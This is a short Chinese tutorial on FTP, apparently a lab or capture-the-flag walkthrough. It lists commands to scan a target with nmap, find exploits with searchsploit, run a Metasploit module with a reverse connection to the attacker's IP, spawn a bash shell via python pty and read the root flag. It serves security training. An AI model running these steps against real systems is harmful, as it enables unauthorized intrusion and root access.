FTB的簡介:
FTP 是File Transfer Protocol(文件傳輸協議)的英文簡稱,而中文簡稱爲“文傳協議”。用於Internet上的控制文件的雙向傳輸。同時,它也是一個應用程序(Application)。基於不同的操作系統有不同的FTP應用程序,而所有這些應用程序都遵守同一種協議以傳輸文件。在FTP的使用當中,用戶經常遇到兩個概念:“下載”(Download)和"上傳"(Upload)。"下載"文件就是從遠程主機拷貝文件至自己的計算機上;"上傳"文件就是將文件從自己的計算機中拷貝至遠程主機上。用Internet語言來說,用戶可通過客戶機程序向(從)遠程主機上傳(下載)文件。
同樣的方法,用nmap -sV ip
語法進行掃描靶機的一些服務信息和服務版本,用nmap -T4 -A -v ip
語法快速掃描靶機的全部信息。
針對掃描的結果進行分析,得出靶機的版本軟件。
然後用searchsploit 版本軟件名稱
進行掃描查看是否有漏洞,如果有會掃描出漏洞文件存儲的根目錄和分位目錄(文件名)。
利用cat 根目錄/文件名
查看源代碼,
然後我們可以進行修改一些參數來實現遠程溢出。
使用metasploit進行溢出
在終端中輸入msfconsole來打開Metasploit(集成了滲透測試當中所有工具安裝框架)。
然後ssearch 軟件及版本號
進行搜索是否有漏洞模塊。
使用exploit 來利用漏洞模塊
use exploit/根目錄
查看可以使用的payload
show payload
設置payload
set payload
設置參數
查看可以設置的參數show options
設置目標IP地址set rhost 靶場IP
設置監聽IP地址set lhost 攻擊機IP
檢測是否設置成功(查看參數)show options
進行遠程溢出exploit
執行命令 (查看用戶當前所得到的權限,即獲得root權限)id
優化shell
使用python pty 終端開啓
python –c “import pty;pty.spawn(‘/bin/bash’)”
flag獲取
一般情況下,靶場機器的flag值是存放在服務器的根目錄下,/root/目錄(ls -alh
查看目錄)。
切換root目錄:cd /root/
查看該目錄是否有flag值:ls
查看對應的flag值:cat flag